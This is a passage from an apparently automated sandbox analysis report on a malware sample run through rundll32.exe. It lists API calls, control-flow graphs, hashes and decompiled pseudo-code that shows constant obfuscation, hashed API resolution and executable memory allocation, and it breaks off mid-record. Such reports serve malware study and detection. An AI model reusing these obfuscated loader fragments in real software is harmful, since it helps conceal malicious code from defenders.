                                                                      control_flow_graph 41 1fe620-1fe66b call 1fea10 44 1fe66d-1fe677 call 1fea10 41->44 45 1fe67a-1fe6aa call 1fe390 VirtualAlloc 41->45 44->45
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001FE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1e0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 061bc175958b1e3d891ac607f0d4a7bad2d014892118e11b02f0dbb87003a93f
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 1B110D60D0828DEAEF01D7E89409BFEBFB55B21704F044098E6456B282D7BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2832 Parent PID: 2416 rundll32.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00463928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 463928-4639b4 call 4479dc 5 4639b6 0->5 6 4639bd-4639cf GetEnhMetaFileA 0->6 5->6 8 4639d1 6->8 9 4639d8-4639ec 6->9 8->9 10 463a0e-463ac5 VirtualAlloc 9->10 11 4639ee-463a0c 9->11 19 463acf-463ada 10->19 11->10 20 463b21-463b33 19->20 21 463adc-463b1f 19->21 22 463b75-463bac 20->22 23 463b35-463b73 20->23 21->19 23->22 23->23
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      • Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
                                                                      • Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 25 461638-461641 26 461643 25->26 27 46164b-4616d1 DdeInitializeA call 461328 call 461a14 25->27 26->27 37 4616d6-4616eb 27->37
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
                                                                      • Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002FEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 2feb40-2feb93 VirtualProtect 40 2feba6-2fec17 39->40 41 2feb95-2feba1 39->41 42 2fec3a-2fec85 call 2fe7a0 call 2fe7e0 40->42 57 2fec19-2fec37 40->57 41->42 50 2fec90-2fec9a 42->50 51 2fec9c-2feca3 50->51 52 2fecf8-2fed4a call 2fe920 50->52 55 2feced-2fecf6 51->55 56 2feca5-2fecac 51->56 62 2fed4c-2fed50 52->62 63 2fed78-2fed7f 52->63 55->50 56->55 60 2fecae-2fecea call 2fe7e0 56->60 57->42 60->55 62->63 66 2fed52-2fed75 call 2fe880 62->66 67 2fed8a-2fed94 63->67 66->63 69 2fede6-2fee1b call 2ff000 67->69 70 2fed96-2fed9d 67->70 73 2fed9f-2feda6 70->73 74 2feddb-2fede4 70->74 73->74 77 2feda8-2fedd9 call 2fee20 VirtualProtect 73->77 74->67 77->74
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 002FEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 002FEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_2e0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: c15a5fceb163e9ff0d3deff042fdae5984c05372b6d4a83c8e461d7c6327cd43
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: F7C1D9B4A10209DFCB48CF88C590EAEB7B6BF88344F158159E919AB351D735EE52CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 80 461a14-461a5a call 461ac8 86 461a70-461aa7 DdeCreateStringHandleA DdeNameService 80->86 87 461a5c-461a69 80->87 90 461aaf 86->90 87->86
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
                                                                      • Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002FE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 91 2fe620-2fe66b call 2fea10 94 2fe66d-2fe677 call 2fea10 91->94 95 2fe67a-2fe6aa call 2fe390 VirtualAlloc 91->95 94->95
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 002FE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_2e0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 6de6407db7ce28ffbb80852cbaa6ebc35b9d05900c275f0f9ea428be5ecc57f4
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 77111260D082CDDEEF01DBE894097FFBFB55F21704F044098D6456B282D6BA57588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00428330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
                                                                      • Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004285AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
                                                                      • Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
                                                                      • Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004284D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
                                                                      • Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
                                                                      • Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
                                                                      • Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00462B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
                                                                      • Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      • Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
                                                                      • Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004280E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2106122060.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 3040 Parent PID: 2832 rundll32.exeCOMMON

                                                                      Executed Functions

                                                                      Function 003C3928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 3c3928-3c39b4 call 3a79dc 477 3c39bd-3c39cf GetEnhMetaFileA 472->477 478 3c39b6 472->478 480 3c39d8-3c39ec 477->480 481 3c39d1 477->481 478->477 482 3c3a0e-3c3ac5 VirtualAlloc 480->482 483 3c39ee-3c3a0c 480->483 481->480 491 3c3acf-3c3ada 482->491 483->482 492 3c3adc-3c3b1f 491->492 493 3c3b21-3c3b33 491->493 492->491 494 3c3b75-3c3bac 493->494 495 3c3b35-3c3b73 493->495 495->494 495->495
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 003C39C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,003C6CB4,00001000,00000040), ref: 003C3A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|l<
                                                                      • API String ID: 2643768156-2874746031
                                                                      • Opcode ID: 81bb05bb29205ec379e1e0c0c5b6faacce6aab5161c9a8a0cf877b5e6c9dfe2d
                                                                      • Instruction ID: 60b3fa6b299525f7252d46074e9417a53ec18f63da30256bd9ee62ba3ac8e997
                                                                      • Opcode Fuzzy Hash: 81bb05bb29205ec379e1e0c0c5b6faacce6aab5161c9a8a0cf877b5e6c9dfe2d
                                                                      • Instruction Fuzzy Hash: 56618575645200AFD743DF68ED87E1A37AAFB48744F00C029E089CB266DF7AB8848B44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003704C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 497 3704c7-370565 call 367378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E003704C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E00367378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}









                                                                      0x003704cd
                                                                      0x003704d6
                                                                      0x003704dd
                                                                      0x003704e1
                                                                      0x003704e5
                                                                      0x003704ec
                                                                      0x003704f8
                                                                      0x003704fd
                                                                      0x00370502
                                                                      0x00370509
                                                                      0x00370510
                                                                      0x00370517
                                                                      0x0037051f
                                                                      0x00370522
                                                                      0x00370529
                                                                      0x00370530
                                                                      0x00370537
                                                                      0x00370556
                                                                      0x00370560

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00370560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: d15061843e7682043cd7b43bb496ac766729cea4b04f9e74b1b9d247793e49f1
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 7911F771E0520CEBEB04DFE4D84AADEBBB1EB50714F10C189E414AB284D7F96B548F81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00369B5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 526 369b5e-369c3f call 372550 call 367378 RtlAllocateHeap
                                                                      C-Code - Quality: 72%
                                                                      			E00369B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t52;
				void* _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				long _t81;

				_push(_a12);
				_t81 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00372550(_t52);
				_v36 = 0x84647;
				asm("stosd");
				asm("stosd");
				_t70 = 0x14;
				asm("stosd");
				_v20 = 0xbd42;
				_t71 = 0x62;
				_v20 = _v20 / _t70;
				_v20 = _v20 ^ 0x00000265;
				_v16 = 0x7dd6;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x742f5ff0;
				_v16 = _v16 ^ 0x742f2524;
				_v12 = 0x61c8;
				_t72 = 0x48;
				_v12 = _v12 / _t72;
				_v12 = _v12 + 0xffff34fc;
				_v12 = _v12 ^ 0xffff6696;
				_v8 = 0xb2ad;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 * 0xd;
				_v8 = _v8 | 0x4443bccc;
				_v8 = _v8 ^ 0x475ff878;
				E00367378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
				return _t68;
			}















                                                                      0x00369b66
                                                                      0x00369b69
                                                                      0x00369b6b
                                                                      0x00369b6e
                                                                      0x00369b71
                                                                      0x00369b73
                                                                      0x00369b78
                                                                      0x00369b87
                                                                      0x00369b8c
                                                                      0x00369b8d
                                                                      0x00369b90
                                                                      0x00369b91
                                                                      0x00369b9d
                                                                      0x00369b9e
                                                                      0x00369ba3
                                                                      0x00369baa
                                                                      0x00369bb8
                                                                      0x00369bbd
                                                                      0x00369bc4
                                                                      0x00369bcb
                                                                      0x00369bd5
                                                                      0x00369bdd
                                                                      0x00369be0
                                                                      0x00369be7
                                                                      0x00369bee
                                                                      0x00369c05
                                                                      0x00369c0c
                                                                      0x00369c0f
                                                                      0x00369c16
                                                                      0x00369c29
                                                                      0x00369c38
                                                                      0x00369c3f

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 00369C38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: $%/t
                                                                      • API String ID: 1279760036-1978068534
                                                                      • Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction ID: 910712628278cacaefc58fd0b6283cab58b4d60a8cb88bb9daaf69b91a38e399
